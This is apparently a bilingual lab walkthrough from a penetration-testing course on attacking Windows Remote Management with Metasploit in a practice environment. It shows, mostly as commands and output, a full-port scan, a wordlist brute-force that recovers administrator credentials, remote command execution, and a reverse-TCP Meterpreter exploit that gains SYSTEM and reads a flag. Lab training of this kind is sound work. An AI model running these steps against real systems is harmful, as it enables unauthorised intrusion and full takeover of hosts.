Exploiting WinRM (Windows Remote Management Protocol)
Exploiting WinRM
Windows Remote Management (WinRM) is a Windows remote management protocol that can be used to facilitate remote access with Windows systems.
WinRM is typically used in the following ways:
- Remotely access and interact with Windows hosts on a local network.
- Remotely access and execute commands on Windows systems on the Internet.
- Manage and configure Windows systems remotely.
WinRM typically uses TCP 5985 and 5986 (HTTPS).
WinRM implements access control and security for communication between systems through various forms of authentication.
We can utilize the MSF to identify WinRM users and their passwords as well as execute commands on the target system.
We can also utilize a MSF WinRM exploit module to obtain a meterpreter session on the target system.
利用 WinRM(Windows 远程管理协议)
利用 WinRM
Windows 远程管理 (WinRM) 是一种 Windows 远程管理协议,可用于促进对 Windows 系统的远程访问。
WinRM 通常以下列方式使用:
- 远程访问本地网络上的 Windows 主机并与之交互。
- 在 Internet 上远程访问和执行 Windows 系统上的命令。
- 远程管理和配置 Windows 系统。
WinRM 通常使用 TCP 5985 和 5986 (HTTPS)。
WinRM 通过各种形式的身份验证实现系统间通信的访问控制和安全。
我们可以利用 MSF 来识别 WinRM 用户和他们的密码,以及在目标系统上执行命令。
我们还可以利用 MSF WinRM 漏洞利用模块在目标系统上获取 meterpreter 会话。
Demo: Exploiting WinRM (Windows Remote Management Protocol)(演示:利用 WinRM(Windows 远程管理协议))
We are trying to exploit WinRM itself by, first and foremost, identifying a username and password combination that can provide us with access. And then we’re going to take a look at the various Metasploit framework modules that can allow us to execute commands remotely on the target system with the actual credentials. And then we can also utilize a Metasploit Framework WinRM exploit module that can be used to obtain a Meterpreter session on the target system in order to gain remote access to the target system via a Meterpreter session. And the actual privileges that we’ll be able to obtain will depend on the credentials that we’re able to discover in regards to the permissions associated with the username and the password.
1
Target IP Address: 10.4.22.219
Make sure that the PostgreSQL database service is started.
1
service postgresql start
That will allow us to communicate and interact with the Metasploit Framework database.
1
msfconsole
Create a workspace.
1
workspace -a WinRM
Perform an Nmap scan on the target system. And we’re going to utilize the db_nmap command to perform the Nmap scan within the Metasploit Framework console and consequently save all of the results into the Metasploit Framework database in this particular workspace to be specific.
-sS: Perform a SYN scan.
-sV: Perform service version detection.
-O: Perform operating system detection.
It’s going to save the results into the Metasploit Framework database so that we can access the results whenever we want.
1
db_nmap -sS -sV -O 10.4.22.219
We aren’t able to identify the WinRM service running. And that is primarily because we did not specify the actual port range to use. And by default, Nmap will scan 1,000 of the most commonly used ports. So we actually need to specify to Nmap that we want to scan the entire TCP port range, which is about 65,535 ports. And that will help us identify the actual service.
1
db_nmap -sS -sV -O -p- 10.4.22.219
List out the services.
1
services
On port 5985 we have the WinRM service running.
The first order of business in regards to actually confirming whether we do have a WinRM service running on the target is to actually check out the authentication methods that are supported by WinRM on the target.
1
search type:auxiliary winrm
Set up the global variable for the RHOSTS value.
1
setg RHOSTS 10.4.22.219
That will tell us, first and foremost, whether WinRM is actually enabled on the target system. And it’s also going to tell us the actual authentication method supported by the WinRM service on the target.
1
2
3
use auxiliary/scanner/winrm/winrm_auth_methods
show options
run
We can then specify the target URI of the WinRM service. So to confirm this, we can open up our browser.
1
http://10.4.22.219:5985
It tells us that the requested resource is not found. And if we try and access the /wsman service or the directory. It doesn’t respond or provide us with any output.
1
http://10.4.22.219:5985/wsman
It tells us that, indeed, WinRM is running on the target system. And the two authentication methods that are supported are the Negotiate protocol and the Basic protocol. So that means we can perform a brute-force on WinRM on the target in order to identify both the username and password that can consequently give us access to the target system and consequently allow us to execute commands remotely.
We can utilize winrm_login to perform a brute-force.
1
2
3
search winrm_login
use auxiliary/scanner/winrm/winrm_login
show options
We’re going to perform a brute-force for both the username and password.
1
2
3
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
run
We’re able to identify some legitimate credentials.
CMD: Specify the actual command to run on the target system to confirm whether this, indeed, works. We can set it to the whoami command, which will essentially tell us what permissions we have with the username administrator.
The command that we run tells us that we are currently the server administrator. So we should have administrator privileges if we are able to obtain a Meterpreter session.
1
2
3
4
5
6
7
search winrm_cmd
use auxiliary/scanner/winrm/winrm_cmd
show options
set USERNAME administrator
set PASSWORD tinkerbell
set CMD whoami
run
So in order to execute or to obtain a Meterpreter session through WinRM, we can utilize another module. And this is going to be an exploit module.
1
2
3
4
5
6
search winrm_script
use exploit/windows/winrm/winrm_scripts_exec
show options
set USERNAME administrator
set PASSWORD tinkerbell
run
We have an issue with the actual runtime. And the reason it’s doing that is because we didn’t actually set the FORCE_VBS, or Visual Basic Script, option. We have the ability to force the module to utilize the VBS command stager, which in this case, we need to do, instead of utilizing the Powershell command stager.
1
2
set FORCE_VBS true
run
And it’s going to send the command stager.
Once the command stager is sent, it’ll then send the stage, and we’ll get a Meterpreter session. It is then going to attempt to migrate to a specified system level process in order to achieve administrative privileges.
And in this case, it tells us that the session is admin but not system. so it’s going to get us NT AUTHORITY\SYSTEM privileges. It does that by migrating to the svchost process.
1
2
3
meterpreter > sysinfo
...
Meterpreter : x64/windows
We obtain a 64-bit Meterpreter session, not really because we utilized the 64-bit meterpreter payload, but because we migrated, or this particular module automatically migrates, to the svchost process, which is a 64-bit process.
1
2
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
We now have NT AUTHORITY\SYSTEM privileges, which are the highest level of privileges on a Windows system, which consequently means that we don’t need to elevate our privileges.
That is how to exploit the WinRM service that’s running on a target system.
WinRM: Exploitation with Metasploit
Overview
A Kali GUI machine and a target machine running a WinRM server are provided to you. The IP address of the target machine is provided in a text file named target placed on the Desktop of the Kali machine (/root/Desktop/target).
Your task is to fingerprint the WinRM service using the tools available on the Kali machine and then exploit the vulnerability using the Metasploit framework exploit and auxiliary modules.
Objective: Exploit the WinRM service to get a meterpreter on the target and retrieve the flag!
Instructions:
- Your Kali machine has an interface with IP address 10.10.X.Y. Run “ip addr” to know the values of X and Y.
- The IP address of the target machine is mentioned in the file “/root/Desktop/target”
- Do not attack the gateway located at IP address 192.V.W.1 and 10.10.X.1 Dictionaries to use:
- /usr/share/metasploit-framework/data/wordlists/common_users.txt
- /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
Solutions
The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-2026.pdf
我自己的思路
1
Target IP Address : 10.0.20.77
1
2
3
4
5
6
root@attackdefense:~# service postgresql start
Starting PostgreSQL 12 database server: main.
root@attackdefense:~# msfconsole -q
msf5 > workspace -a WinRM
[*] Added workspace: WinRM
[*] Workspace: WinRM
1
2
3
4
5
6
7
8
9
10
msf5 > db_nmap -sS -sV -O 10.0.20.77
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2023-01-28 19:01 IST
[*] Nmap: Nmap scan report for 10.0.20.77
[*] Nmap: Host is up (0.0023s latency).
[*] Nmap: Not shown: 996 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds?
[*] Nmap: 3389/tcp open ms-wbt-server Microsoft Terminal Services
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
msf5 > db_nmap -sS -sV -O -p- 10.0.20.77
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2023-01-28 19:06 IST
[*] Nmap: Nmap scan report for 10.0.20.77
[*] Nmap: Host is up (0.0024s latency).
[*] Nmap: Not shown: 65521 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds?
[*] Nmap: 3389/tcp open ms-wbt-server Microsoft Terminal Services
[*] Nmap: 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
[*] Nmap: 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
[*] Nmap: 49664/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49665/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49666/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49667/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49668/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49669/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49671/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49673/tcp open msrpc Microsoft Windows RPC
[*] Nmap: No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
[*] Nmap: TCP/IP fingerprint:
[*] Nmap: OS:SCAN(V=7.70%E=4%D=1/28%OT=135%CT=1%CU=33823%PV=Y%DS=3%DC=I%G=Y%TM=63D526
[*] Nmap: OS:59%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10A%TI=I%CI=I%II=I%SS=S%TS
[*] Nmap: OS:=U)OPS(O1=M546NW8NNS%O2=M546NW8NNS%O3=M546NW8%O4=M546NW8NNS%O5=M546NW8NN
[*] Nmap: OS:S%O6=M546NNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y
[*] Nmap: OS:%DF=Y%T=7F%W=FFFF%O=M546NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=7F%S=O%A=S+%F=AS%RD
[*] Nmap: OS:=0%Q=)T2(R=Y%DF=Y%T=7F%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=7F%W=0%
[*] Nmap: OS:S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=7F%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R
[*] Nmap: OS:=Y%DF=Y%T=7F%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=7F%W=0%S=A%A=O%F
[*] Nmap: OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=7F%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
[*] Nmap: OS:T=7F%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=7F%CD
[*] Nmap: OS:=Z)
[*] Nmap: Network Distance: 3 hops
[*] Nmap: Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 397.40 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
msf5 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
10.0.20.77 135 tcp msrpc open Microsoft Windows RPC
10.0.20.77 139 tcp netbios-ssn open Microsoft Windows netbios-ssn
10.0.20.77 445 tcp microsoft-ds open
10.0.20.77 3389 tcp ms-wbt-server open Microsoft Terminal Services
10.0.20.77 5985 tcp http open Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
10.0.20.77 47001 tcp http open Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
10.0.20.77 49664 tcp msrpc open Microsoft Windows RPC
10.0.20.77 49665 tcp msrpc open Microsoft Windows RPC
10.0.20.77 49666 tcp msrpc open Microsoft Windows RPC
10.0.20.77 49667 tcp msrpc open Microsoft Windows RPC
10.0.20.77 49668 tcp msrpc open Microsoft Windows RPC
10.0.20.77 49669 tcp msrpc open Microsoft Windows RPC
10.0.20.77 49671 tcp msrpc open Microsoft Windows RPC
10.0.20.77 49673 tcp msrpc open Microsoft Windows RPC
1
2
3
4
5
6
7
8
9
10
11
12
13
14
msf5 > search type:auxiliary winrm
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/winrm/winrm_auth_methods normal No WinRM Authentication Method Detection
1 auxiliary/scanner/winrm/winrm_cmd normal No WinRM Command Runner
2 auxiliary/scanner/winrm/winrm_login normal No WinRM Login Utility
3 auxiliary/scanner/winrm/winrm_wql normal No WinRM WQL Query Runner
Interact with a module by name or index, for example use 3 or use auxiliary/scanner/winrm/winrm_wql
WinRM Authentication Method Detection
This module sends a request to an HTTP/HTTPS service to see if it is a WinRM service. If it is a WinRM service, it also gathers the Authentication Methods supported.
WinRM 身份验证方法检测
此模块向 HTTP/HTTPS 服务发送请求以查看它是否为 WinRM 服务。如果它是 WinRM 服务,它还会收集支持的身份验证方法。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
msf5 > setg RHOSTS 10.0.20.77
RHOSTS => 10.0.20.77
msf5 > use auxiliary/scanner/winrm/winrm_auth_methods
msf5 auxiliary(scanner/winrm/winrm_auth_methods) > show options
Module options (auxiliary/scanner/winrm/winrm_auth_methods):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentification
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.0.20.77 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5985 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
THREADS 1 yes The number of concurrent threads (max one per host)
URI /wsman yes The URI of the WinRM service
VHOST no HTTP server virtual host
msf5 auxiliary(scanner/winrm/winrm_auth_methods) > run
[+] 10.0.20.77:5985: Negotiate protocol supported
[+] 10.0.20.77:5985: Basic protocol supported
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
1
http://10.0.20.77:5985/
1
2
3
Not Found
HTTP Error 404. The requested resource is not found.
1
http://10.0.20.77:5985/wsman
This module attempts to authenticate to a WinRM service. It currently works only if the remote end allows Negotiate(NTLM) authentication. Kerberos is not currently supported. Please note: in order to use this module without SSL, the ‘AllowUnencrypted’ winrm option must be set. Otherwise adjust the port and set the SSL options in the module as appropriate.
WinRM 登录实用程序
此模块尝试对 WinRM 服务进行身份验证。它目前仅在远程端允许协商 (NTLM) 身份验证时才有效。当前不支持 Kerberos。请注意:为了在没有 SSL 的情况下使用此模块,必须设置“AllowUnencrypted”winrm 选项。否则调整端口并适当设置模块中的 SSL 选项。
1
2
3
4
5
6
7
8
9
10
11
msf5 auxiliary(scanner/winrm/winrm_auth_methods) > search winrm_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/winrm/winrm_login normal No WinRM Login Utility
msf5 auxiliary(scanner/winrm/winrm_auth_methods) > use auxiliary/scanner/winrm/winrm_login
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
msf5 auxiliary(scanner/winrm/winrm_login) > show options
Module options (auxiliary/scanner/winrm/winrm_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DOMAIN WORKSTATION yes The domain to use for Windows authentification
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.0.20.77 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5985 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
URI /wsman yes The URI of the WinRM service
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
msf5 auxiliary(scanner/winrm/winrm_login) > set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
USER_FILE => /usr/share/metasploit-framework/data/wordlists/common_users.txt
msf5 auxiliary(scanner/winrm/winrm_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
PASS_FILE => /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
msf5 auxiliary(scanner/winrm/winrm_login) > set VERBOSE false
VERBOSE => false
1
2
3
4
5
msf5 auxiliary(scanner/winrm/winrm_login) > run
[+] 10.0.20.77:5985 - Login Successful: WORKSTATION\administrator:tinkerbell
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
This module runs arbitrary Windows commands using the WinRM Service
WinRM 命令运行程序
该模块使用 WinRM 服务运行任意 Windows 命令
重启了Lab,Target IP Address : 10.0.16.20。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
msf5 > search winrm_cmd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/winrm/winrm_cmd normal No WinRM Command Runner
msf5 > use auxiliary/scanner/winrm/winrm_cmd
msf5 auxiliary(scanner/winrm/winrm_cmd) > show options
Module options (auxiliary/scanner/winrm/winrm_cmd):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD ipconfig /all yes The windows command to run
DOMAIN WORKSTATION yes The domain to use for Windows authentification
PASSWORD yes The password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5985 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
THREADS 1 yes The number of concurrent threads (max one per host)
URI /wsman yes The URI of the WinRM service
USERNAME yes The username to authenticate as
VHOST no HTTP server virtual host
msf5 auxiliary(scanner/winrm/winrm_cmd) > setg RHOSTS 10.0.16.20
RHOSTS => 10.0.16.20
msf5 auxiliary(scanner/winrm/winrm_cmd) > set USERNAME administrator
USERNAME => administrator
msf5 auxiliary(scanner/winrm/winrm_cmd) > set PASSWORD tinkerbell
PASSWORD => tinkerbell
msf5 auxiliary(scanner/winrm/winrm_cmd) > set CMD whoami
CMD => whoami
msf5 auxiliary(scanner/winrm/winrm_cmd) > run
[+] 10.0.16.20:5985 : server\administrator
[+] Results saved to /root/.msf4/loot/20230128200653_WinRM_10.0.16.20_winrm.cmd_result_895726.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
WinRM Script Exec Remote Code Execution
This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2 (and above) and VBS CmdStager. The module will check if Powershell is available, and if so uses that method. Otherwise it falls back to the VBS CmdStager which is less stealthy.
WinRM Script Exec 远程代码执行
此模块使用有效凭据登录 WinRM 服务并执行负载。它有两种可用的有效载荷传递方法:Powershell 2(及更高版本)和 VBS CmdStager。该模块将检查 Powershell 是否可用,如果可用,则使用该方法。否则它会回退到不太隐蔽的 VBS CmdStager。
1
2
3
4
5
6
7
8
9
10
11
12
msf5 auxiliary(scanner/winrm/winrm_cmd) > search winrm_script
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/winrm/winrm_script_exec 2012-11-01 manual No WinRM Script Exec Remote Code Execution
msf5 auxiliary(scanner/winrm/winrm_cmd) > use exploit/windows/winrm/winrm_script_exec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
msf5 exploit(windows/winrm/winrm_script_exec) > show options
Module options (exploit/windows/winrm/winrm_script_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN WORKSTATION yes The domain to use for Windows authentification
FORCE_VBS false yes Force the module to use the VBS CmdStager
PASSWORD yes A specific password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.0.16.20 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5985 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URI /wsman yes The URI of the WinRM service
URIPATH no The URI to use for this exploit (default is random)
USERNAME yes A specific username to authenticate as
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.21.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
1
2
3
4
5
6
7
8
9
10
msf5 exploit(windows/winrm/winrm_script_exec) > set USERNAME administrator
USERNAME => administrator
msf5 exploit(windows/winrm/winrm_script_exec) > set PASSWORD tinkerbell
PASSWORD => tinkerbell
msf5 exploit(windows/winrm/winrm_script_exec) > run
[*] Started reverse TCP handler on 10.10.21.2:4444
[*] checking for Powershell 2.0
[-] Exploit failed: RuntimeError [BUG] Unexpected node test: <:child>: <[:qname, "w", "Items"]>
[*] Exploit completed, but no session was created.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
msf5 exploit(windows/winrm/winrm_script_exec) > set FORCE_VBS true
FORCE_VBS => true
msf5 exploit(windows/winrm/winrm_script_exec) > run
[*] Started reverse TCP handler on 10.10.21.2:4444
[*] User selected the FORCE_VBS option
[*] Command Stager progress - 2.01% done (2046/101936 bytes)
[*] Command Stager progress - 4.01% done (4092/101936 bytes)
[*] Command Stager progress - 6.02% done (6138/101936 bytes)
[*] Command Stager progress - 8.03% done (8184/101936 bytes)
[*] Command Stager progress - 10.04% done (10230/101936 bytes)
[*] Command Stager progress - 12.04% done (12276/101936 bytes)
[*] Command Stager progress - 14.05% done (14322/101936 bytes)
[*] Command Stager progress - 16.06% done (16368/101936 bytes)
[*] Command Stager progress - 18.06% done (18414/101936 bytes)
[*] Command Stager progress - 20.07% done (20460/101936 bytes)
[*] Command Stager progress - 22.08% done (22506/101936 bytes)
[*] Command Stager progress - 24.09% done (24552/101936 bytes)
[*] Command Stager progress - 26.09% done (26598/101936 bytes)
[*] Command Stager progress - 28.10% done (28644/101936 bytes)
[*] Command Stager progress - 30.11% done (30690/101936 bytes)
[*] Command Stager progress - 32.11% done (32736/101936 bytes)
[*] Command Stager progress - 34.12% done (34782/101936 bytes)
[*] Command Stager progress - 36.13% done (36828/101936 bytes)
[*] Command Stager progress - 38.14% done (38874/101936 bytes)
[*] Command Stager progress - 40.14% done (40920/101936 bytes)
[*] Command Stager progress - 42.15% done (42966/101936 bytes)
[*] Command Stager progress - 44.16% done (45012/101936 bytes)
[*] Command Stager progress - 46.16% done (47058/101936 bytes)
[*] Command Stager progress - 48.17% done (49104/101936 bytes)
[*] Command Stager progress - 50.18% done (51150/101936 bytes)
[*] Command Stager progress - 52.19% done (53196/101936 bytes)
[*] Command Stager progress - 54.19% done (55242/101936 bytes)
[*] Command Stager progress - 56.20% done (57288/101936 bytes)
[*] Command Stager progress - 58.21% done (59334/101936 bytes)
[*] Command Stager progress - 60.21% done (61380/101936 bytes)
[*] Command Stager progress - 62.22% done (63426/101936 bytes)
[*] Command Stager progress - 64.23% done (65472/101936 bytes)
[*] Command Stager progress - 66.24% done (67518/101936 bytes)
[*] Command Stager progress - 68.24% done (69564/101936 bytes)
[*] Command Stager progress - 70.25% done (71610/101936 bytes)
[*] Command Stager progress - 72.26% done (73656/101936 bytes)
[*] Command Stager progress - 74.26% done (75702/101936 bytes)
[*] Command Stager progress - 76.27% done (77748/101936 bytes)
[*] Command Stager progress - 78.28% done (79794/101936 bytes)
[*] Command Stager progress - 80.29% done (81840/101936 bytes)
[*] Command Stager progress - 82.29% done (83886/101936 bytes)
[*] Command Stager progress - 84.30% done (85932/101936 bytes)
[*] Command Stager progress - 86.31% done (87978/101936 bytes)
[*] Command Stager progress - 88.31% done (90024/101936 bytes)
[*] Command Stager progress - 90.32% done (92070/101936 bytes)
[*] Command Stager progress - 92.33% done (94116/101936 bytes)
[*] Command Stager progress - 94.34% done (96162/101936 bytes)
[*] Command Stager progress - 96.34% done (98208/101936 bytes)
[*] Command Stager progress - 98.35% done (100252/101936 bytes)
[*] Sending stage (176195 bytes) to 10.0.16.20
[*] Meterpreter session 1 opened (10.10.21.2:4444 -> 10.0.16.20:49791) at 2023-01-28 20:22:12 +0530
[*] Session ID 1 (10.10.21.2:4444 -> 10.0.16.20:49791) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'
[*] Current session process is ffvdc.exe (3060) as: SERVER\Administrator
[*] Session is Admin but not System.
[*] Will attempt to migrate to specified System level process.
[-] Could not migrate to services.exe.
[-] Could not migrate to wininit.exe.
[*] Trying svchost.exe (896)
[+] Successfully migrated to svchost.exe (896) as: NT AUTHORITY\SYSTEM
[*] nil
[*] Command Stager progress - 100.00% done (101936/101936 bytes)
meterpreter >
1
2
3
4
5
6
7
8
9
10
meterpreter > sysinfo
Computer : SERVER
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
1
2
3
4
5
meterpreter > search -f flag.txt
Found 1 result...
c:\flag.txt (32 bytes)
meterpreter > cat c:\\flag.txt
3c716f95616eec677a7078f92657a230
-
Previous
Exploiting Windows MS17-010 SMB Vulnerability -
Next
Exploiting A Vulnerable Apache Tomcat Web Server
